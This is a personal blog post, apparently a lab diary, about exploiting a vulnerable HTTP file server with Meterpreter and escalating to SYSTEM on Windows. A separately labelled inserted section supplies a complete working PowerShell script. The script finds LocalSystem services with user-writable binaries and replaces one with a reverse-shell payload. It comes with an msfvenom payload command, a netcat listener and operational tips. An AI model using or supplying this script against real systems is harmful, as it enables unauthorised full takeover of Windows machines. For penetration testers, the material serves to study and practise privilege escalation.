Today was a lot of fun. After almost a week of not being able to do much hacking, I was able to get down and dirty with some Windows manipulation. Luckily, today involved both Meterpreter and the old-fashioned way of executing a script.
Since I’m still learning the intricate ins and outs of Meterpreter, it was good to go through some of the same routines for capturing a Windows machine. The capture today was due to a flaw in an HTTP file server. It was a known flaw that had an assigned Exploit Database number. This meant that I could simply Google the version number of the server and have the code for the script pop up.
To play around with Meterpreter, I decided to download the script and have it ready, but also did a Meterpreter search for the particular software. Needless to say, it turned up pretty quickly… but this wasn’t my real goal; I wanted to play around with PowerShell after I pwned the box and see if I could get privilege escalation.
Using meterpreter, the reverse shell was pretty easy to get. After putting in the standard options for the target IP and port, I just typed ‘exploit’ and watched the magic happen. It took about three attempts before it worked, but that’s becoming more and more common in the hacking that I’m doing. The key there is to never give up!
Once I had a Meterpreter shell, I had to Google how to turn that into PowerShell, but it was fairly easy. The PS prompt showed up, and I could start playing around with the various commands to enumerate the situation.
One of the services on the box could be restarted by a regular user, so this meant that I could stop the service, replace the executable with one that I had made, and then restart the service once again. If the service was running as SYSTEM when I restarted it, that would mean that I would have root privileges in a shell. So I ran a command using ‘msfvenom’ and compiled an executable with a reverse shell payload. After uploading it to the box and replacing the service’s executable with the payload file, I went ahead and restarted the service using PowerShell.
With a netcat listener started up, I received the reverse shell as soon as the service was restarted. This came with root privileges and ultimate freedom to do whatever I wanted.
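The service-binary swap described above, as an added PowerShell example that is not code from the original post: it enumerates services that run as LocalSystem and whose on-disk executable the current low-privilege user can modify, then stops the chosen service, swaps in an uploaded payload, and restarts it so the Service Control Manager launches the payload as SYSTEM. The payload path (`C:\Users\Public\payload.exe`), the listener port (4444) and the choice of the first match are assumptions; the payload itself is assumed to have been built with something like `msfvenom -p windows/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f exe-service -o payload.exe` and uploaded beforehand, and `nc -lvnp 4444` is already listening on the attacker side.

```powershell
# Added example, not code from the original post. Finds services running as
# LocalSystem whose executable the current user can overwrite, then swaps in a
# reverse-shell payload and restarts the service. Service name, binary path,
# payload path and listener port are assumptions.

$PayloadPath = 'C:\Users\Public\payload.exe'   # assumed: uploaded earlier

function Get-PrincipalNames {
    # Current user plus every group in the token, as DOMAIN\Name strings,
    # so ACL entries granted to groups like BUILTIN\Users are matched too.
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $names = @($id.Name)
    foreach ($g in $id.Groups) {
        try { $names += $g.Translate([System.Security.Principal.NTAccount]).Value } catch {}
    }
    $names
}

function Get-ServiceImagePath([string]$PathName) {
    # "C:\Program Files\X\svc.exe" -arg  ->  C:\Program Files\X\svc.exe
    if (-not $PathName) { return $null }
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Test-WritableByMe([string]$Path) {
    # True if any Allow ACE on the file grants Write/Modify/FullControl to the
    # current user or one of their groups.
    $principals = Get-PrincipalNames
    $writeBits  = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($principals -notcontains $ace.IdentityReference.Value) { continue }
        if ([int]$ace.FileSystemRights -band [int]$writeBits) { return $true }
    }
    return $false
}

function Find-ReplaceableSystemServices {
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' } |
        ForEach-Object {
            $exe = Get-ServiceImagePath $_.PathName
            if ($exe -and (Test-Path -LiteralPath $exe) -and (Test-WritableByMe $exe)) {
                [pscustomobject]@{ Name = $_.Name; State = $_.State; ImagePath = $exe }
            }
        }
}

function Invoke-ServiceBinarySwap {
    param([string]$Name, [string]$ImagePath, [string]$Payload)
    # Stop/Start only succeed if the service's own DACL grants this user those
    # rights; as in the post, the check is simply whether the call works.
    Stop-Service -Name $Name -Force -ErrorAction Stop
    Copy-Item -LiteralPath $ImagePath -Destination "$ImagePath.bak" -Force   # keep original for cleanup
    Copy-Item -LiteralPath $Payload   -Destination $ImagePath -Force
    # The SCM now runs our binary as SYSTEM. A plain msfvenom exe never answers the
    # service controller, so Start-Service reports a timeout even though the shell
    # has already called back; an exe-service payload avoids that.
    Start-Service -Name $Name -ErrorAction SilentlyContinue
}

# Usage: enumerate, show candidates, then swap the first one (listener must be up).
$targets = @(Find-ReplaceableSystemServices)
$targets | Format-Table -AutoSize
if ($targets.Count -gt 0) {
    Invoke-ServiceBinarySwap -Name $targets[0].Name -ImagePath $targets[0].ImagePath -Payload $PayloadPath
}
```

Two practical notes: pick the target service deliberately rather than blindly taking the first match, since stopping the wrong service can take the box's own functionality (or your foothold) down with it, and restore the `.bak` copy once you have the SYSTEM shell so the service comes back up normally on the next restart.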
After finishing the hack with Meterpreter, I wanted to go back and do the same hack using the script found on the Exploit Database site. This was pretty simple and just involved putting in my IP address for the callback and setting up another netcat listener.
Overall, the hacks were fun, and I was able to learn a lot more than I anticipated. I’ve been concentrating on Windows for the last couple of weeks, so it’s starting to become pretty straightforward… this sounds like a win to me!